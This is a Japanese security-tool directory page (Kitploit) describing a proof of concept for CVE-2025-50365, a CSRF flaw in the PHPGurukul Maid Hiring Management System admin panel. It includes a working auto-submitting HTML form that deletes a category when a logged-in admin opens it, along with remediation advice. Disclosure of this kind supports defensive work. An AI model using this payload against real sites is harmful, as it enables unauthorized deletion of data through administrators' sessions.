Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-50365_CSRF_DELETE_CATEGORY-phpgurukul-CVE — PoC for CVE-2025-50365: PHPGurukul Maid Hiring Management System における CSRF 脆弱性。細工された管理者リクエストを介して、採用カテゴリの削除を可能にします。 | Kitploit
ツール/GitHubGitHub/1h3ll/cve-2025-50365_csrf_delete_category-phpgurukul-cve
脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育
GitHub1h3ll/cve-2025-50365_csrf_delete_category-phpgurukul-cve

CVE-2025-50365_CSRF_DELETE_CATEGORY-phpgurukul-CVE

PoC for CVE-2025-50365: PHPGurukul Maid Hiring Management System における CSRF 脆弱性。細工された管理者リクエストを介して、採用カテゴリの削除を可能にします。

リポジトリを見る
31年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

プロジェクト名とリポジトリURL: Maid Hiring Management System using PHP and MySQL

脆弱性タイプ: クライアントサイドリクエストフォージェリ

影響を受けるバージョン: v1.0

💣脆弱性説明: PHPGurukul採用管理システムの管理パネルにクロスサイトリクエストフォージェリ (CSRF) の脆弱性が存在します。攻撃者は認証済み管理者を悪意のあるサイトにアクセスさせることで、任意の採用カテゴリを削除できます。これにより、データの削除や管理者権限での不正な変更が発生する可能性があります。

👩‍💻影響: 不正なカテゴリ削除。

🛜概念実証 (PoC):

  1. 認証済み管理者のみがカテゴリを削除できる機能がありました。 1
  2. エンドポイント /admin/manage-category.php にGETリクエストを送信するHTMLコード CSRF-POC
root@kitploit:~
<html>
  <body>
    <form action="http://127.0.0.1/mhms/admin/manage-category.php">
      <input type="hidden" name="delid" value="13" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
  1. このHTMLコードを使用して悪意のあるURLを作成します。 3
  2. 管理者がリンクをクリックすると、カテゴリが削除されます。 4 5

推奨事項: 管理フォームにCSRFトークンを実装し、SameSiteクッキーを強制し、リクエストの発信元を検証して不正な操作を防止します。

ツールをダウンロード